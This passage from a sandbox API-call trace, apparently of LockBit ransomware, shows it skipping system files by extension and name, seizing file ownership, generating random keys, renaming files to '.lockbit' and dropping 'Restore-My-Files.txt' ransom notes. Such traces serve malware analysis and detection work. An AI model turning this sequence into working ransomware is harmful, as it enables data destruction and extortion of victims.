(lpString1=".rom", lpString2=".png") returned 1 [0081.979] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.979] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.979] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.979] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.979] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.980] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Memories_buttonClear.png") returned 1 [0081.980] lstrcmpiW (lpString1="ntldr", lpString2="Memories_buttonClear.png") returned 1 [0081.980] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Memories_buttonClear.png") returned 1 [0081.980] lstrcmpiW (lpString1="bootsect.bak", lpString2="Memories_buttonClear.png") returned -1 [0081.980] lstrcmpiW (lpString1="autorun.inf", lpString2="Memories_buttonClear.png") returned -1 [0081.980] lstrcmpiW (lpString1="thumbs.db", lpString2="Memories_buttonClear.png") returned 1 [0081.980] lstrcmpiW (lpString1="iconcache.db", lpString2="Memories_buttonClear.png") returned -1 [0081.980] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.980] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png") returned=".png" [0081.980] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.980] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.980] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.980] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.981] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.981] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.981] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.981] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.981] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.981] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.981] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.981] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.981] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png.lockbit") returned 86 [0081.981] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\memories_buttonclear.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.982] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.982] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.982] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.983] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.983] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.983] RtlFreeAnsiString (AnsiString="\\") [0081.983] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.983] malloc (_Size=0x200) returned 0x77d800 [0081.983] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.983] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.983] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.983] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.984] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.984] CloseHandle (hObject=0x3b4) returned 1 [0081.984] free (_Block=0x77d800) [0081.984] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\memories_buttonclear.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.984] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.984] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.985] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2899) returned 1 [0081.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.986] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.995] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.995] malloc (_Size=0xc2) returned 0x77d800 [0081.995] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0081.996] free (_Block=0x77d800) [0081.996] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.996] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.996] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.996] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7122e0f4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7122e0f4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2a88, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_btn-back-static.png", cAlternateFileName="")) returned 1 [0081.996] lstrcmpiW (lpString1=".", lpString2="Notes_btn-back-static.png") returned -1 [0081.996] lstrcmpiW (lpString1="..", lpString2="Notes_btn-back-static.png") returned -1 [0081.996] PathFindExtensionW (pszPath="Notes_btn-back-static.png") returned=".png" [0081.996] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.997] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.997] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.997] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.997] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.998] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.998] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.998] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.998] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.998] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.998] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.998] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.998] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.999] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Notes_btn-back-static.png") returned 1 [0081.999] lstrcmpiW (lpString1="ntldr", lpString2="Notes_btn-back-static.png") returned 1 [0081.999] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Notes_btn-back-static.png") returned 1 [0081.999] lstrcmpiW (lpString1="bootsect.bak", lpString2="Notes_btn-back-static.png") returned -1 [0081.999] lstrcmpiW (lpString1="autorun.inf", lpString2="Notes_btn-back-static.png") returned -1 [0081.999] lstrcmpiW (lpString1="thumbs.db", lpString2="Notes_btn-back-static.png") returned 1 [0081.999] lstrcmpiW (lpString1="iconcache.db", lpString2="Notes_btn-back-static.png") returned -1 [0081.999] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.999] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png") returned=".png" [0081.999] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.999] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.999] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.999] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.000] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.000] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.000] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.000] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.000] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.000] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.000] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.000] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.000] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png.lockbit") returned 87 [0082.000] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.001] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.001] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.001] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.002] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.002] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.002] RtlFreeAnsiString (AnsiString="\\") [0082.002] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.002] malloc (_Size=0x200) returned 0x77d800 [0082.002] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.002] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.002] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.002] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.003] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.003] CloseHandle (hObject=0x3c4) returned 1 [0082.003] free (_Block=0x77d800) [0082.003] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.003] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.003] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.004] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10888) returned 1 [0082.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.005] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.017] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.017] malloc (_Size=0xc4) returned 0x77d800 [0082.017] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0082.017] free (_Block=0x77d800) [0082.017] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0082.017] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0082.017] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.017] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7127a3ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7127a3ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a7ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_content-background.png", cAlternateFileName="")) returned 1 [0082.017] lstrcmpiW (lpString1=".", lpString2="Notes_content-background.png") returned -1 [0082.018] lstrcmpiW (lpString1="..", lpString2="Notes_content-background.png") returned -1 [0082.018] PathFindExtensionW (pszPath="Notes_content-background.png") returned=".png" [0082.018] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.018] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.018] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.018] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.019] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.019] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.019] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.019] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.019] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.019] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.019] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.019] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.019] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.020] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Notes_content-background.png") returned 1 [0082.020] lstrcmpiW (lpString1="ntldr", lpString2="Notes_content-background.png") returned 1 [0082.020] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Notes_content-background.png") returned 1 [0082.020] lstrcmpiW (lpString1="bootsect.bak", lpString2="Notes_content-background.png") returned -1 [0082.020] lstrcmpiW (lpString1="autorun.inf", lpString2="Notes_content-background.png") returned -1 [0082.020] lstrcmpiW (lpString1="thumbs.db", lpString2="Notes_content-background.png") returned 1 [0082.020] lstrcmpiW (lpString1="iconcache.db", lpString2="Notes_content-background.png") returned -1 [0082.020] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: 